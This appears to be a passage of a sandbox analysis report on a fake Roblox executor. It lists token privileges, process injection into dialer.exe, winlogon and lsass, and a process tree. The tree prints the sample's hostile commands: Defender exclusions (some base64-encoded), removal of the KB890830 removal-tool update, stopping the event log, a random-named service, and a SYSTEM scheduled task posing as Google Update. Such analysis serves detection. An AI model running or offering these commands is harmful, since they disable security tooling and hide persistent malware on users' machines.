Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A (3 identical rows)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (25 identical rows)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A (4 identical rows)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (24 identical rows)

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3176 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (3 identical rows)
PID 3176 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe (3 identical rows)
PID 4364 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (3 identical rows)
PID 4364 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe (3 identical rows)
PID 4364 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe C:\Users\Admin\AppData\Local\Temp\Roblox.exe (2 identical rows)
PID 3176 wrote to memory of 3264 N/A C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe C:\Users\Admin\AppData\Local\Temp\ccccc.exe (2 identical rows)
PID 3372 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe C:\Windows\system32\dialer.exe (7 identical rows)
PID 2632 wrote to memory of 4980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe (2 identical rows)
PID 2036 wrote to memory of 616 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\winlogon.exe
PID 2036 wrote to memory of 664 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\lsass.exe
PID 2036 wrote to memory of 952 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1020 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\dwm.exe
PID 664 wrote to memory of 2752 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe (2 identical rows)
PID 2036 wrote to memory of 748 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 664 wrote to memory of 2752 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 2036 wrote to memory of 892 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 1080 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 1088 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1100 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1156 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1220 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1276 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 1328 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1412 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1444 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 1456 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1564 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1584 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1628 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 1660 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 1736 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 1768 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 1852 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1860 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 1868 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 1932 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 2040 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\spoolsv.exe
PID 2036 wrote to memory of 2104 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 2228 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2036 wrote to memory of 2308 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 2404 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 2412 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 2540 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\sihost.exe
PID 2036 wrote to memory of 2572 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 2644 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2036 wrote to memory of 2692 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\taskhostw.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe

"C:\Users\Admin\AppData\Local\Temp\neoblock level 7.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAeQB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAYQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAawBkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAdQBwACMAPgA="

C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe

"C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcwBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAawBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAaABpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGkAZgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Roblox.exe

"C:\Users\Admin\AppData\Local\Temp\Roblox.exe"

C:\Users\Admin\AppData\Local\Temp\ccccc.exe

"C:\Users\Admin\AppData\Local\Temp\ccccc.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "HGJYCZBA"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "HGJYCZBA" binpath= "C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "HGJYCZBA"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe

C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gnbixakp#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\dialer.exe

dialer.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe 7c17dd8c3f97142a86b911d5eb94f1a5 Eyvf8LEpNkav2LmwIsPTYQ.0.1.0.0.0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gnbixakp#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/NeobloxExecutor/neoblox/issues

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff9f0646f8,0x7fff9f064708,0x7fff9f064718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3832 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3976 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3976 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3916 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

